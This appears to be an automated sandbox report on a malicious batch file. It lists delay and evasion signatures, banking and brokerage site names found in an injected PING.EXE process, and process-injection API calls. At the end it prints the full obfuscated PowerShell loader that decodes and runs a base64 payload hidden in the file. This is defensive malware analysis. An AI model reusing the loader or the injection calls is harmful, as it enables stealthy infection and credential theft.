                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598640Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598531Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598422Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598312Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598203Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598094Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597969Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597859Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597750Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597641Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597422Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597306Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597188Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597063Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596953Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596844Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596500Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596391Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596281Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596172Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595953Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595844Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595719Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595609Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595391Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594843Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594516Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4970Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4899Jump to behavior
                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 9999Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 2057Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 7779Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6784Thread sleep count: 2057 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -599891s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6784Thread sleep count: 7779 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -599780s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -599562s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -599344s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -598987s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -598859s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -598750s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -598640s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -598531s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -598422s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -598312s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -598203s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -598094s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -597969s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -597859s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -597750s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -597641s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -597531s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -597422s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -597306s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -597188s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -597063s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -596953s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -596844s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -596719s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -596609s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -596500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -596391s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -596281s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -596172s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -596062s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -595953s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -595844s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -595719s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -595609s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -595500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -595391s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -595281s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -595172s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -595062s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -594843s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -594734s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -594625s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6760Thread sleep time: -594516s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 1636Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 2192Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599780Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 599109Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598987Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598859Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598750Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598640Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598531Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598422Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598312Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598203Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 598094Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597969Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597859Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597750Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597641Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597422Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597306Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597188Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 597063Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596953Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596844Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596500Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596391Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596281Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596172Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595953Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595844Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595719Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595609Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595391Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594843Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 594516Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: svchost.exe, 0000000C.00000002.2861106018.000002194382B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@|
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: svchost.exe, 0000000C.00000002.2861851391.0000021948E57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: powershell.exe, 00000002.00000002.991277571.000001BEBE981000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: xqeMUGRsN
                Source: powershell.exe, 00000002.00000002.991277571.000001BEBE981000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: xqeMUGRsM
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: PING.EXE, 00000008.00000002.3327316905.0000000000798000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: PING.EXE, 00000008.00000003.1396518926.00000000056D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: PING.EXE, 00000008.00000003.1393293221.0000000005726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_3820.amsi.csv, type: OTHER
                Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.cs.Net Code: WNDZX contains injection code
                Source: 2.2.powershell.exe.1bed4be0000.1.raw.unpack, cdXfw.cs.Net Code: WNDZX contains injection code
                Source: ilgwppf0.dll.9.dr, cdXfw.cs.Net Code: WNDZX contains injection code
                Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.csReference to suspicious API methods: NtAllocateVirtualMemory(process.Handle, ref BJGCZ, 0u, ref NlYZC, 12288u, 64u)
                Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.csReference to suspicious API methods: NtWriteVirtualMemory(process.Handle, BJGCZ, array, NlYZC, ref rFxdG)
                Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.csReference to suspicious API methods: NtCreateThreadEx(ref hPvvx, 2097151u, IntPtr.Zero, process.Handle, BJGCZ, IntPtr.Zero, 0u, 0u, 0u, 0u, IntPtr.Zero)
                Source: 8.2.PING.EXE.68c0000.0.raw.unpack, Z1.csReference to suspicious API methods: LoadLibrary(b1)
                Source: 8.2.PING.EXE.68c0000.0.raw.unpack, Z1.csReference to suspicious API methods: GetProcAddress(intPtr, b2)
                Source: 8.2.PING.EXE.68c0000.0.raw.unpack, Z1.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)4uL, 64u, out var _)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\PING.EXE EIP: 770000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\PING.EXE base: 770000Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"Jump to behavior
